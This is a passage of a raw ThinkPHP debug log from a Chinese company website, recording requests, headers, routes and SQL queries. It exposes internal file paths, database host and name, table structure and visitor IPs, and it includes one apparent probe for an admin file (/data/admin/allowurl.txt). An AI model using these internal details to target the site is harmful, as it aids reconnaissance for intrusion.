--------------------------------------------------------------- [ 2021-07-16T00:12:19+08:00 ] 183.136.225.35 GET / [ info ] www.kinsana.cn/ [运行时间:0.171875s][吞吐率:5.82req/s] [内存消耗:2,015.60kb] [文件加载:52] [ info ] [ LANG ] D:\WWW\kinsasa\thinkphp\lang\zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => '', 1 => NULL, 2 => NULL, ), ) [ info ] [ HEADER ] array ( 'connection' => 'close', 'accept' => '*/*', 'user-agent' => 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:47.0) Gecko/20100101 Firefox/47.0', 'host' => 'www.kinsana.cn', ) [ info ] [ PARAM ] array ( ) [ info ] [ RUN ] app\index\controller\Index->index[ D:\WWW\kinsasa\application\index\controller\Index.php ] [ info ] [ DB ] INIT mysql [ info ] [ VIEW ] D:\WWW\kinsasa\public/../application/index\view\index\index.htm [ array ( 0 => 'gsRes', 1 => 'hyRes', 2 => 'cate', 3 => 'hdp', ) ] [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.015625s ] mysql:host=127.0.0.1;dbname=kinsana;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `news` [ RunTime:0.015625s ] [ sql ] [ SQL ] SELECT `id`,`is_top`,`update_time`,`img`,`title`,`cate_id`,`state`,`dec`,`date` FROM `news` WHERE `cate_id` = '1' AND `state` = '1' ORDER BY `is_top` DESC,`update_time` DESC,`id` DESC LIMIT 3 [ RunTime:0.000000s ] [ sql ] [ SQL ] SELECT `id`,`is_top`,`update_time`,`img`,`title`,`cate_id`,`state`,`dec`,`date` FROM `news` WHERE `cate_id` = '2' AND `state` = '1' ORDER BY `is_top` DESC,`update_time` DESC,`id` DESC LIMIT 3 [ RunTime:0.000000s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `cate` [ RunTime:0.031250s ] [ sql ] [ SQL ] SELECT * FROM `cate` ORDER BY `sort` DESC [ RunTime:0.000000s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `hdp` [ RunTime:0.015625s ] [ sql ] [ SQL ] SELECT * FROM `hdp` ORDER BY `id` ASC [ RunTime:0.000000s ] --------------------------------------------------------------- [ 2021-07-16T00:36:38+08:00 ] 111.41.138.128 POST /api/index/zypro [ info ] www.kinsana.cn/api/index/zypro [运行时间:0.171875s][吞吐率:5.82req/s] [内存消耗:1,875.51kb] [文件加载:43] [ info ] [ LANG ] D:\WWW\kinsasa\thinkphp\lang\zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'api', 1 => 'index', 2 => 'zypro', ), ) [ info ] [ HEADER ] array ( 'cookie' => 'safedog-flow-item=', 'accept-encoding' => 'gzip, deflate', 'referer' => 'http://www.kinsana.cn/m/zycp.html', 'x-requested-with' => 'XMLHttpRequest', 'accept' => '*/*', 'accept-language' => 'zh,zh-CN;q=0.9', 'user-agent' => 'Mozilla/5.0 (Linux; Android 8.0; Pixel 2 Build/OPD3.170816.012) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.7036.1456 Mobile Safari/537.36', 'origin' => 'http://www.kinsana.cn', 'content-length' => '0', 'connection' => 'close', 'host' => 'www.kinsana.cn', ) [ info ] [ PARAM ] array ( '/api/index/zypro' => '', ) [ info ] [ RUN ] app\api\controller\Index->zypro[ D:\WWW\kinsasa\application\api\controller\Index.php ] [ info ] [ DB ] INIT mysql [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.000000s ] mysql:host=127.0.0.1;dbname=kinsana;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `product` [ RunTime:0.015625s ] [ sql ] [ SQL ] SELECT * FROM `product` WHERE `cate_id` = 2 [ RunTime:0.078125s ] --------------------------------------------------------------- [ 2021-07-16T00:36:38+08:00 ] 223.214.135.210 POST /api/index/types [ info ] www.kinsana.cn/api/index/types [运行时间:0.109375s][吞吐率:9.14req/s] [内存消耗:1,691.17kb] [文件加载:43] [ info ] [ LANG ] D:\WWW\kinsasa\thinkphp\lang\zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'api', 1 => 'index', 2 => 'types', ), ) [ info ] [ HEADER ] array ( 'cookie' => 'safedog-flow-item=', 'accept-encoding' => 'gzip, deflate', 'referer' => 'http://www.kinsana.cn/m/zycp.html', 'x-requested-with' => 'XMLHttpRequest', 'accept' => '*/*', 'accept-language' => 'zh,zh-CN;q=0.9', 'content-type' => 'application/x-www-form-urlencoded; charset=UTF-8', 'user-agent' => 'Mozilla/5.0 (Linux; Android 8.0; Pixel 2 Build/OPD3.170816.012) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.7036.1456 Mobile Safari/537.36', 'origin' => 'http://www.kinsana.cn', 'content-length' => '9', 'connection' => 'close', 'host' => 'www.kinsana.cn', ) [ info ] [ PARAM ] array ( '/api/index/types' => '', 'cate_id' => '2', ) [ info ] [ RUN ] app\api\controller\Index->types[ D:\WWW\kinsasa\application\api\controller\Index.php ] [ info ] [ DB ] INIT mysql [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.015625s ] mysql:host=127.0.0.1;dbname=kinsana;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `product` [ RunTime:0.015625s ] [ sql ] [ SQL ] SELECT `type_id` FROM `product` WHERE `cate_id` = 2 [ RunTime:0.000000s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `type` [ RunTime:0.015625s ] [ sql ] [ SQL ] SELECT * FROM `type` WHERE `id` IN (1) [ RunTime:0.000000s ] --------------------------------------------------------------- [ 2021-07-16T00:37:08+08:00 ] 54.223.155.16 POST /api/index/jqpro [ info ] www.kinsana.cn/api/index/jqpro [运行时间:0.093750s][吞吐率:10.67req/s] [内存消耗:1,796.32kb] [文件加载:43] [ info ] [ LANG ] D:\WWW\kinsasa\thinkphp\lang\zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'api', 1 => 'index', 2 => 'jqpro', ), ) [ info ] [ HEADER ] array ( 'connection' => 'close', 'accept-encoding' => 'gzip, deflate', 'referer' => 'http://www.kinsana.cn/m/jqycp.html', 'x-requested-with' => 'XMLHttpRequest', 'accept' => '*/*', 'user-agent' => 'Mozilla/5.0 (Linux; Android 8.0; Pixel 2 Build/OPD3.170816.012) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.1318.1544 Mobile Safari/537.36', 'cookie' => 'safedog-flow-item=', 'accept-language' => 'zh,zh-CN;q=0.9', 'origin' => 'http://www.kinsana.cn', 'content-length' => '0', 'host' => 'www.kinsana.cn', ) [ info ] [ PARAM ] array ( '/api/index/jqpro' => '', ) [ info ] [ RUN ] app\api\controller\Index->jqpro[ D:\WWW\kinsasa\application\api\controller\Index.php ] [ info ] [ DB ] INIT mysql [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.015625s ] mysql:host=127.0.0.1;dbname=kinsana;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `product` [ RunTime:0.015625s ] [ sql ] [ SQL ] SELECT * FROM `product` WHERE `cate_id` = 1 [ RunTime:0.000000s ] --------------------------------------------------------------- [ 2021-07-16T00:37:09+08:00 ] 54.223.155.16 POST /api/index/types [ info ] www.kinsana.cn/api/index/types [运行时间:0.093750s][吞吐率:10.67req/s] [内存消耗:1,693.38kb] [文件加载:43] [ info ] [ LANG ] D:\WWW\kinsasa\thinkphp\lang\zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'api', 1 => 'index', 2 => 'types', ), ) [ info ] [ HEADER ] array ( 'connection' => 'close', 'accept-encoding' => 'gzip, deflate', 'referer' => 'http://www.kinsana.cn/m/jqycp.html', 'x-requested-with' => 'XMLHttpRequest', 'accept' => '*/*', 'content-type' => 'application/x-www-form-urlencoded; charset=UTF-8', 'user-agent' => 'Mozilla/5.0 (Linux; Android 8.0; Pixel 2 Build/OPD3.170816.012) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.1318.1544 Mobile Safari/537.36', 'cookie' => 'safedog-flow-item=', 'accept-language' => 'zh,zh-CN;q=0.9', 'origin' => 'http://www.kinsana.cn', 'content-length' => '9', 'host' => 'www.kinsana.cn', ) [ info ] [ PARAM ] array ( '/api/index/types' => '', 'cate_id' => '1', ) [ info ] [ RUN ] app\api\controller\Index->types[ D:\WWW\kinsasa\application\api\controller\Index.php ] [ info ] [ DB ] INIT mysql [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.015625s ] mysql:host=127.0.0.1;dbname=kinsana;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `product` [ RunTime:0.015625s ] [ sql ] [ SQL ] SELECT `type_id` FROM `product` WHERE `cate_id` = 1 [ RunTime:0.000000s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `type` [ RunTime:0.015625s ] [ sql ] [ SQL ] SELECT * FROM `type` WHERE `id` IN (8,5,1,3) [ RunTime:0.000000s ] --------------------------------------------------------------- [ 2021-07-16T00:38:05+08:00 ] 117.183.146.104 POST /api/index/procontent [ info ] www.kinsana.cn/api/index/procontent [运行时间:0.078125s][吞吐率:12.80req/s] [内存消耗:1,735.91kb] [文件加载:43] [ info ] [ LANG ] D:\WWW\kinsasa\thinkphp\lang\zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'api', 1 => 'index', 2 => 'procontent', ), ) [ info ] [ HEADER ] array ( 'cookie' => 'safedog-flow-item=', 'accept-encoding' => 'gzip, deflate', 'referer' => 'http://www.kinsana.cn/m/cpxq.html?id=74', 'x-requested-with' => 'XMLHttpRequest', 'accept' => '*/*', 'accept-language' => 'zh,zh-CN;q=0.9', 'content-type' => 'application/x-www-form-urlencoded; charset=UTF-8', 'user-agent' => 'Mozilla/5.0 (Linux; Android 8.0; Pixel 2 Build/OPD3.170816.012) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.4011.1774 Mobile Safari/537.36', 'origin' => 'http://www.kinsana.cn', 'content-length' => '5', 'connection' => 'close', 'host' => 'www.kinsana.cn', ) [ info ] [ PARAM ] array ( '/api/index/procontent' => '', 'id' => '74', ) [ info ] [ RUN ] app\api\controller\Index->procontent[ D:\WWW\kinsasa\application\api\controller\Index.php ] [ info ] [ DB ] INIT mysql [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.000000s ] mysql:host=127.0.0.1;dbname=kinsana;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `product` [ RunTime:0.015625s ] [ sql ] [ SQL ] SELECT * FROM `product` `a` INNER JOIN `type` `c` ON `a`.`type_id`=`c`.`id` WHERE `a`.`id` = '74' LIMIT 1 [ RunTime:0.000000s ] --------------------------------------------------------------- [ 2021-07-16T00:38:29+08:00 ] 54.222.174.44 POST /api/index/newscontent [ info ] www.kinsana.cn/api/index/newscontent [运行时间:0.078125s][吞吐率:12.80req/s] [内存消耗:1,700.65kb] [文件加载:43] [ info ] [ LANG ] D:\WWW\kinsasa\thinkphp\lang\zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'api', 1 => 'index', 2 => 'newscontent', ), ) [ info ] [ HEADER ] array ( 'connection' => 'close', 'accept-encoding' => 'gzip, deflate', 'referer' => 'http://www.kinsana.cn/m/xwxq.html?id=3', 'x-requested-with' => 'XMLHttpRequest', 'accept' => '*/*', 'content-type' => 'application/x-www-form-urlencoded; charset=UTF-8', 'user-agent' => 'Mozilla/5.0 (Linux; Android 5.0; SM-G900P Build/LRX21T) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.9456.1098 Mobile Safari/537.36', 'cookie' => 'safedog-flow-item=', 'accept-language' => 'zh,zh-CN;q=0.9', 'origin' => 'http://www.kinsana.cn', 'content-length' => '4', 'host' => 'www.kinsana.cn', ) [ info ] [ PARAM ] array ( '/api/index/newscontent' => '', 'id' => '3', ) [ info ] [ RUN ] app\api\controller\Index->newscontent[ D:\WWW\kinsasa\application\api\controller\Index.php ] [ info ] [ DB ] INIT mysql [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.000000s ] mysql:host=127.0.0.1;dbname=kinsana;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `news` [ RunTime:0.031250s ] [ sql ] [ SQL ] SELECT * FROM `news` WHERE `id` = 3 LIMIT 1 [ RunTime:0.000000s ] --------------------------------------------------------------- [ 2021-07-16T00:39:21+08:00 ] 52.80.71.29 POST /api/index/newscontent [ info ] www.kinsana.cn/api/index/newscontent [运行时间:0.109375s][吞吐率:9.14req/s] [内存消耗:1,736.30kb] [文件加载:43] [ info ] [ LANG ] D:\WWW\kinsasa\thinkphp\lang\zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'api', 1 => 'index', 2 => 'newscontent', ), ) [ info ] [ HEADER ] array ( 'connection' => 'close', 'accept-encoding' => 'gzip, deflate', 'referer' => 'http://www.kinsana.cn/m/xwxq.html?id=11', 'x-requested-with' => 'XMLHttpRequest', 'accept' => '*/*', 'content-type' => 'application/x-www-form-urlencoded; charset=UTF-8', 'user-agent' => 'Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.8404.1665 Mobile Safari/537.36', 'cookie' => 'safedog-flow-item=', 'accept-language' => 'zh,zh-CN;q=0.9', 'origin' => 'http://www.kinsana.cn', 'content-length' => '5', 'host' => 'www.kinsana.cn', ) [ info ] [ PARAM ] array ( '/api/index/newscontent' => '', 'id' => '11', ) [ info ] [ RUN ] app\api\controller\Index->newscontent[ D:\WWW\kinsasa\application\api\controller\Index.php ] [ info ] [ DB ] INIT mysql [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.000000s ] mysql:host=127.0.0.1;dbname=kinsana;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `news` [ RunTime:0.015625s ] [ sql ] [ SQL ] SELECT * FROM `news` WHERE `id` = 11 LIMIT 1 [ RunTime:0.015625s ] --------------------------------------------------------------- [ 2021-07-16T00:39:54+08:00 ] 139.214.34.234 GET /index.html [ info ] www.kinsana.cn/index.html [运行时间:0.125000s][吞吐率:8.00req/s] [内存消耗:2,019.95kb] [文件加载:52] [ info ] [ LANG ] D:\WWW\kinsasa\thinkphp\lang\zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'index', 1 => NULL, 2 => NULL, ), ) [ info ] [ HEADER ] array ( 'accept-encoding' => 'gzip, deflate', 'accept' => 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8', 'accept-language' => 'zh,zh-CN;q=0.9', 'user-agent' => 'Mozilla/5.0 (iPhone; CPU iPhone OS 11_0 like Mac OS X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3627.1915 Mobile Safari/537.36', 'upgrade-insecure-requests' => '1', 'connection' => 'close', 'host' => 'www.kinsana.cn', ) [ info ] [ PARAM ] array ( '/index_html' => '', ) [ info ] [ RUN ] app\index\controller\Index->index[ D:\WWW\kinsasa\application\index\controller\Index.php ] [ info ] [ DB ] INIT mysql [ info ] [ VIEW ] D:\WWW\kinsasa\public/../application/index\view\index\index.htm [ array ( 0 => 'gsRes', 1 => 'hyRes', 2 => 'cate', 3 => 'hdp', ) ] [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.015625s ] mysql:host=127.0.0.1;dbname=kinsana;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `news` [ RunTime:0.015625s ] [ sql ] [ SQL ] SELECT `id`,`is_top`,`update_time`,`img`,`title`,`cate_id`,`state`,`dec`,`date` FROM `news` WHERE `cate_id` = '1' AND `state` = '1' ORDER BY `is_top` DESC,`update_time` DESC,`id` DESC LIMIT 3 [ RunTime:0.000000s ] [ sql ] [ SQL ] SELECT `id`,`is_top`,`update_time`,`img`,`title`,`cate_id`,`state`,`dec`,`date` FROM `news` WHERE `cate_id` = '2' AND `state` = '1' ORDER BY `is_top` DESC,`update_time` DESC,`id` DESC LIMIT 3 [ RunTime:0.000000s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `cate` [ RunTime:0.015625s ] [ sql ] [ SQL ] SELECT * FROM `cate` ORDER BY `sort` DESC [ RunTime:0.000000s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `hdp` [ RunTime:0.015625s ] [ sql ] [ SQL ] SELECT * FROM `hdp` ORDER BY `id` ASC [ RunTime:0.000000s ] --------------------------------------------------------------- [ 2021-07-16T00:41:50+08:00 ] 118.116.35.111 POST /api/index/cwypro [ info ] www.kinsana.cn/api/index/cwypro [运行时间:0.187500s][吞吐率:5.33req/s] [内存消耗:1,715.15kb] [文件加载:43] [ info ] [ LANG ] D:\WWW\kinsasa\thinkphp\lang\zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'api', 1 => 'index', 2 => 'cwypro', ), ) [ info ] [ HEADER ] array ( 'cookie' => 'safedog-flow-item=', 'accept-encoding' => 'gzip, deflate', 'referer' => 'http://www.kinsana.cn/m/cwycp.html', 'x-requested-with' => 'XMLHttpRequest', 'accept' => '*/*', 'accept-language' => 'zh,zh-CN;q=0.9', 'user-agent' => 'Mozilla/5.0 (iPhone; CPU iPhone OS 11_0 like Mac OS X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.5354.1374 Mobile Safari/537.36', 'origin' => 'http://www.kinsana.cn', 'content-length' => '0', 'connection' => 'close', 'host' => 'www.kinsana.cn', ) [ info ] [ PARAM ] array ( '/api/index/cwypro' => '', ) [ info ] [ RUN ] app\api\controller\Index->cwypro[ D:\WWW\kinsasa\application\api\controller\Index.php ] [ info ] [ DB ] INIT mysql [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.015625s ] mysql:host=127.0.0.1;dbname=kinsana;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `product` [ RunTime:0.015625s ] [ sql ] [ SQL ] SELECT * FROM `product` WHERE `cate_id` = 3 [ RunTime:0.109375s ] --------------------------------------------------------------- [ 2021-07-16T00:41:50+08:00 ] 118.116.35.111 POST /api/index/types [ info ] www.kinsana.cn/api/index/types [运行时间:0.093750s][吞吐率:10.67req/s] [内存消耗:1,694.79kb] [文件加载:43] [ info ] [ LANG ] D:\WWW\kinsasa\thinkphp\lang\zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'api', 1 => 'index', 2 => 'types', ), ) [ info ] [ HEADER ] array ( 'cookie' => 'safedog-flow-item=', 'accept-encoding' => 'gzip, deflate', 'referer' => 'http://www.kinsana.cn/m/cwycp.html', 'x-requested-with' => 'XMLHttpRequest', 'accept' => '*/*', 'accept-language' => 'zh,zh-CN;q=0.9', 'content-type' => 'application/x-www-form-urlencoded; charset=UTF-8', 'user-agent' => 'Mozilla/5.0 (iPhone; CPU iPhone OS 11_0 like Mac OS X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.5354.1374 Mobile Safari/537.36', 'origin' => 'http://www.kinsana.cn', 'content-length' => '9', 'connection' => 'close', 'host' => 'www.kinsana.cn', ) [ info ] [ PARAM ] array ( '/api/index/types' => '', 'cate_id' => '3', ) [ info ] [ RUN ] app\api\controller\Index->types[ D:\WWW\kinsasa\application\api\controller\Index.php ] [ info ] [ DB ] INIT mysql [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.015625s ] mysql:host=127.0.0.1;dbname=kinsana;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `product` [ RunTime:0.015625s ] [ sql ] [ SQL ] SELECT `type_id` FROM `product` WHERE `cate_id` = 3 [ RunTime:0.000000s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `type` [ RunTime:0.015625s ] [ sql ] [ SQL ] SELECT * FROM `type` WHERE `id` IN (1,2,3,7,5,10) [ RunTime:0.000000s ] --------------------------------------------------------------- [ 2021-07-16T00:42:56+08:00 ] 106.11.157.75 GET /index/news/xwxq/id/167.html [ info ] www.kinsana.cn/index/news/xwxq/id/167.html [运行时间:0.125000s][吞吐率:8.00req/s] [内存消耗:2,172.81kb] [文件加载:55] [ info ] [ LANG ] D:\WWW\kinsasa\thinkphp\lang\zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'index', 1 => 'news', 2 => 'xwxq', ), ) [ info ] [ HEADER ] array ( 'connection' => 'close', 'accept-language' => 'zh-CN,zh;q=0.9', 'accept' => '*/*', 'user-agent' => 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.81 YisouSpider/5.0 Safari/537.36', 'upgrade-insecure-requests' => '1', 'host' => 'www.kinsana.cn', 'accept-encoding' => 'gzip, deflate', ) [ info ] [ PARAM ] array ( '/index/news/xwxq/id/167_html' => '', 'id' => '167', ) [ info ] [ RUN ] app\index\controller\News->xwxq[ D:\WWW\kinsasa\application\index\controller\News.php ] [ info ] [ DB ] INIT mysql [ info ] [ CACHE ] INIT File [ info ] [ VIEW ] D:\WWW\kinsasa\public/../application/index\view\news\xwxq.htm [ array ( 0 => 'res', 1 => 'fasts', 2 => 'nexts', ) ] [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.046875s ] mysql:host=127.0.0.1;dbname=kinsana;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `news` [ RunTime:0.015625s ] [ sql ] [ SQL ] SELECT * FROM `news` WHERE `id` = 167 LIMIT 1 [ RunTime:0.000000s ] [ sql ] [ SQL ] UPDATE `news` SET `pv`=`pv`+1 WHERE `id` = 167 [ RunTime:0.000000s ] [ sql ] [ SQL ] SELECT `id`,`is_top`,`update_time`,`img`,`title`,`cate_id`,`state`,`dec`,`date` FROM `news` WHERE `cate_id` = '2' ORDER BY `is_top` DESC,`update_time` DESC,`id` DESC [ RunTime:0.000000s ] --------------------------------------------------------------- [ 2021-07-16T01:00:53+08:00 ] 106.11.158.100 GET /index/news/hydtnews.html?page=16 [ info ] www.kinsana.cn/index/news/hydtnews.html?page=16 [运行时间:0.359375s][吞吐率:2.78req/s] [内存消耗:2,084.17kb] [文件加载:56] [ info ] [ LANG ] D:\WWW\kinsasa\thinkphp\lang\zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'index', 1 => 'news', 2 => 'hydtnews', ), ) [ info ] [ HEADER ] array ( 'connection' => 'close', 'accept-language' => 'zh-CN,zh;q=0.9', 'accept' => '*/*', 'user-agent' => 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.81 YisouSpider/5.0 Safari/537.36', 'upgrade-insecure-requests' => '1', 'host' => 'www.kinsana.cn', 'accept-encoding' => 'gzip, deflate', ) [ info ] [ PARAM ] array ( '/index/news/hydtnews_html' => '', 'page' => '16', ) [ info ] [ RUN ] app\index\controller\News->hydtnews[ D:\WWW\kinsasa\application\index\controller\News.php ] [ info ] [ DB ] INIT mysql [ info ] [ VIEW ] D:\WWW\kinsasa\public/../application/index\view\news\hydtnews.htm [ array ( 0 => 'newRes', 1 => 'page', ) ] [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.000000s ] mysql:host=127.0.0.1;dbname=kinsana;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `news` [ RunTime:0.015625s ] [ sql ] [ SQL ] SELECT COUNT(*) AS tp_count FROM `news` WHERE `cate_id` = '2' AND `state` = '1' LIMIT 1 [ RunTime:0.000000s ] [ sql ] [ SQL ] SELECT `id`,`is_top`,`update_time`,`img`,`title`,`cate_id`,`state`,`dec`,`date` FROM `news` WHERE `cate_id` = '2' AND `state` = '1' ORDER BY `is_top` DESC,`update_time` DESC,`id` DESC LIMIT 120,8 [ RunTime:0.203125s ] --------------------------------------------------------------- [ 2021-07-16T01:03:56+08:00 ] 106.225.149.184 GET /data/admin/allowurl.txt [ info ] www.kinsana.cn/data/admin/allowurl.txt [运行时间:0.093750s][吞吐率:10.67req/s] [内存消耗:1,069.13kb] [文件加载:38] [ info ] [ LANG ] D:\WWW\kinsasa\thinkphp\lang\zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'data', 1 => 'admin', 2 => 'allowurl.txt', ), ) [ info ] [ HEADER ] array ( 'content-type' => 'application/x-www-form-urlencoded', 'connection' => 'close', 'accept' => '*/*', 'accept-encoding' => 'gzip, deflate', 'user-agent' => 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:48.0) Gecko/20100101 Firefox/48.0', 'host' => 'www.kinsana.cn', ) [ info ] [ PARAM ] array ( '/data/admin/allowurl_txt' => '', ) [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2021-07-16T01:11:18+08:00 ] 27.224.136.216 GET / [ info ] www.kinsana.cn/ [运行时间:0.156250s][吞吐率:6.40req/s] [内存消耗:2,015.79kb] [文件加载:52] [ info ] [ LANG ] D:\WWW\kinsasa\thinkphp\lang\zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => '', 1 => NULL, 2 => NULL, ), ) [ info ] [ HEADER ] array ( 'connection' => 'close', 'accept-encoding' => 'deflate, gzip', 'accept' => '*/*', 'host' => 'www.kinsana.cn', 'user-agent' => 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:7.0.1) Gecko/20100101 Firefox/7.0.1', ) [ info ] [ PARAM ] array ( ) [ info ] [ RUN ] app\index\controller\Index->index[ D:\WWW\kinsasa\application\index\controller\Index.php ] [ info ] [ DB ] INIT mysql [ info ] [ VIEW ] D:\WWW\kinsasa\public/../application/index\view\index\index.htm [ array ( 0 => 'gsRes', 1 => 'hyRes', 2 => 'cate', 3 => 'hdp', ) ] [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.015625s ] mysql:host=127.0.0.1;dbname=kinsana;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `news` [ RunTime:0.015625s ] [ sql ] [ SQL ] SELECT `id`,`is_top`,`update_time`,`img`,`title`,`cate_id`,`state`,`dec`,`date` FROM `news` WHERE `cate_id` = '1' AND `state` = '1' ORDER BY `is_top` DESC,`update_time` DESC,`id` DESC LIMIT 3 [ RunTime:0.000000s ] [ sql ] [ SQL ] SELECT `id`,`is_top`,`update_time`,`img`,`title`,`cate_id`,`state`,`dec`,`date` FROM `news` WHERE `cate_id` = '2' AND `state` = '1' ORDER BY `is_top` DESC,`update_time` DESC,`id` DESC LIMIT 3 [ RunTime:0.000000s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `cate` [ RunTime:0.015625s ] [ sql ] [ SQL ] SELECT * FROM `cate` ORDER BY `sort` DESC [ RunTime:0.000000s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `hdp` [ RunTime:0.015625s ] [ sql ] [ SQL ] SELECT * FROM `hdp` ORDER BY `id` ASC [ RunTime:0.000000s ] --------------------------------------------------------------- [ 2021-07-16T01:35:54+08:00 ] 106.11.154.80 GET /index/product/cpxq/id/108.html [ info ] www.kinsana.cn/index/product/cpxq/id/108.html [运行时间:0.125000s][吞吐率:8.00req/s] [内存消耗:1,987.82kb] [文件加载:52] [ info ] [ LANG ] D:\WWW\kinsasa\thinkphp\lang\zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'index', 1 => 'product', 2 => 'cpxq', ), ) [ info ] [ HEADER ] array ( 'connection' => 'close', 'accept-language' => 'zh-CN,zh;q=0.9', 'accept' => '*/*', 'user-agent' => 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.81 YisouSpider/5.0 Safari/537.36', 'upgrade-insecure-requests' => '1', 'host' => 'www.kinsana.cn', 'accept-encoding' => 'gzip, deflate', ) [ info ] [ PARAM ] array ( '/index/product/cpxq/id/108_html' => '', 'id' => '108', ) [ info ] [ RUN ] app\index\controller\Product->cpxq[ D:\WWW\kinsasa\application\index\controller\Product.php ] [ info ] [ DB ] INIT mysql [ info ] [ VIEW ] D:\WWW\kinsasa\public/../application/index\view\product\cpxq.htm [ array ( 0 => 'res', 1 => 'photoRes', ) ] [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.015625s ] mysql:host=127.0.0.1;dbname=kinsana;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `product` [ RunTime:0.015625s ] [ sql ] [ SQL ] SELECT * FROM `product` `p` INNER JOIN `type` `t` ON `p`.`type_id`=`t`.`id` WHERE `p`.`id` = '108' LIMIT 1 [ RunTime:0.000000s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `goods_photo` [ RunTime:0.015625s ] [ sql ] [ SQL ] SELECT * FROM `goods_photo` WHERE `goods_id` = 108 [ RunTime:0.000000s ] --------------------------------------------------------------- [ 2021-07-16T01:42:58+08:00 ] 106.11.158.68 GET /index/product/cpxq/id/146.html [ info ] www.kinsana.cn/index/product/cpxq/id/146.html [运行时间:0.125000s][吞吐率:8.00req/s] [内存消耗:2,018.48kb] [文件加载:52] [ info ] [ LANG ] D:\WWW\kinsasa\thinkphp\lang\zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 